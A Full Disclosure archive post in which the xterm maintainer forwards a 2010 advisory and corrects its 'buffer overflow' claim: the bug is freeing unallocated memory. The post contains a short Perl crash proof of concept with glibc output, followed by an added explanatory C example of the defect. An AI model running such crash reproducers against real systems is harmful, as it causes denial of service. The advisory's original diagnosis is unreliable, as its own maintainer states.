Full Disclosure mailing list archives
[SecurityArchitect-008]: Xterm Local Buffer Overflow Vulnerability (fwd)
From: Thomas Dickey <dickey () his com>
Date: Wed, 13 Oct 2010 20:05:13 -0400 (EDT)
The report is inaccurate (not a buffer overflow, but freeing unallocated memory). For reference, this is Debian #600129 in xterm's changelog.
--
Thomas E. Dickey
http://invisible-island.net
ftp://invisible-island.net

---------- Forwarded message ----------
Date: Wed, 13 Oct 2010 19:50:36 -0400
From: Thomas Dickey <tom () invisible-island net>
To: Thomas Dickey <dickey () his com>
Subject: [Full-disclosure] [SecurityArchitect-008]: Xterm Local Buffer Overflow Vulnerability

[Full-disclosure] [SecurityArchitect-008]: Xterm Local Buffer Overflow Vulnerability
musashi karak0rsan karakorsankara at hotmail.com
Wed Sep 1 15:24:30 BST 2010

Product: Xterm
Vulnerability: Buffer Overflow (heap-based)
Credits: Celil Ünüver from SecurityArchitect.Org
Tested on: Ubuntu 10.04 and xterm(256) version

Details:
Xterm's "-fw , -fwb , -fb" command line options causes an overflow while writing long argument..

PoC:
# Contact: www.securityarchitect.org
$file = "A" x 500;
$print = "xterm -fw $file";
system $print;

Results:
pc at ubuntu:~/Masaüstü$ perl xterm.pl
*** glibc detected *** xterm: munmap_chunk(): invalid pointer: 0x09f593a4 ***
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(+0x6b591)[0x2fd591]
/lib/tls/i686/cmov/libc.so.6(+0x6c80e)[0x2fe80e]

Greets: hellcode
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
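The defect class named in the reply above (freeing memory that was never allocated), shown as an added example that is not part of the thread and is not xterm's code. The `font_opt` holder and its functions are hypothetical: an option value may point at borrowed storage (an `argv[]` string or a built-in default) or at a heap copy, and only the heap copy may reach `free()`.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical holder for a font option value; not xterm's structures. */
typedef struct {
    const char *value; /* current setting */
    int owned;         /* 1 only if value was returned by malloc() */
} font_opt;

/* Free the value only when this module allocated it; returns 1 if free()
 * ran. Handing free() a borrowed pointer makes glibc abort the process. */
int opt_release(font_opt *o) {
    int freed = o->owned;
    if (freed)
        free((void *)o->value);
    o->value = NULL;
    o->owned = 0;
    return freed;
}

/* Point at storage owned elsewhere, e.g. argv[] or a string literal. */
int opt_borrow(font_opt *o, const char *s) {
    int freed = opt_release(o);
    o->value = s;
    return freed;
}

/* Store a private heap copy; returns -1 if allocation fails. */
int opt_copy(font_opt *o, const char *s) {
    size_t n = strlen(s) + 1;
    char *copy = malloc(n);
    if (copy == NULL)
        return -1;
    memcpy(copy, s, n);
    int freed = opt_release(o);
    o->value = copy;
    o->owned = 1;
    return freed;
}

/* Constructed input: a 500-byte argument, the length used in the PoC.
 * Returns how many times free() was actually called. */
int exercise(void) {
    static char arg[501];
    font_opt o = { "fixed", 0 };          /* borrowed default */
    memset(arg, 'A', 500);
    int frees = opt_borrow(&o, arg);      /* old value borrowed: no free */
    frees += opt_copy(&o, arg);           /* old value borrowed: no free */
    frees += opt_copy(&o, "fixed");       /* old value was a heap copy */
    return frees + opt_release(&o);       /* heap copy released */
}
```

Dropping the `owned` check in `opt_release` turns the first two replacements in `exercise` into frees of non-heap pointers, which glibc's allocator checks reject at run time.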
Current thread:
- [SecurityArchitect-008]: Xterm Local Buffer Overflow Vulnerability (fwd) Thomas Dickey (Oct 14)